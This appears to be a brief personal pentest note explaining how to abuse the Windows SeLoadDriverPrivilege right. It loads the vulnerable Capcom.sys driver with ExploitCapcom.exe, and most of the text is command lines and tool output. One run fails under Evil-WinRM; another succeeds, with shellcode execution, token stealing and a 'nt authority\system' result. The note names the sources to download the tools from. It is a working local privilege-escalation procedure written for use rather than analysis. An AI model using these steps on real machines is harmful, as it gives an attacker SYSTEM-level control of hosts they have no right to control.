Exploit SeLoadDriverPrivilege for windows, note by manesec.
Need two file Capcom.sys and ExploitCapcom.exe.
ExploitCapcom.exe can download from here, or git clone this.
Capcom.sys can download from here, or git clone this.
NOTE: Please use the absolute path !!!!!
ExploitCapcom.exe LOAD C:\mane\Capcom.sys
ExploitCapcom.exe EXPLOIT whoamiFailed message:
C:\mane>ExploitCapcom.exe EXPLOIT whoami
ExploitCapcom.exe EXPLOIT whoami
[*] Capcom.sys exploit
[-] CreateFile failedI found that when you are trying to exploit via Evil-WinRM, it will be failed.
*Evil-WinRM* PS C:\mane> ./ExploitCapcom.exe LOAD C:\mane\Capcom.sys
[*] Service Name: whqobdxtø/°È
[+] Enabling SeLoadDriverPrivilege
[+] SeLoadDriverPrivilege Enabled
[+] Loading Driver: \Registry\User\S-1-5-21-2633719317-1471316042-3957863514-1104\????????????????????
NTSTATUS: c0000034, WinError: 0
*Evil-WinRM* PS C:\mane> ./ExploitCapcom.exe EXPLOIT whoami
[*] Capcom.sys exploit
[-] CreateFile failedYou may need to spawn CMD shell to exploit it.
When it Success, it will return:
C:\mane>ExploitCapcom.exe LOAD C:\\mane\Capcom.sys
ExploitCapcom.exe LOAD C:\\mane\Capcom.sys
[*] Service Name: iihqptxj��tE]
[+] Enabling SeLoadDriverPrivilege
[+] SeLoadDriverPrivilege Enabled
[+] Loading Driver: \Registry\User\S-1-5-21-2633719317-1471316042-3957863514-1104\????????????????????
NTSTATUS: 00000000, WinError: 0
C:\mane>ExploitCapcom.exe EXPLOIT whoami
ExploitCapcom.exe EXPLOIT whoami
[*] Capcom.sys exploit
[*] Capcom.sys handle was obtained as 0000000000000064
[*] Shellcode was placed at 000001BCE4D10008
[+] Shellcode was executed
[+] Token stealing was successful
[+] Command Executed
nt authority\system
C:\mane>Capcom.sysFrom M4t35Z's BlogExploitCapcom.exeFrom clubby789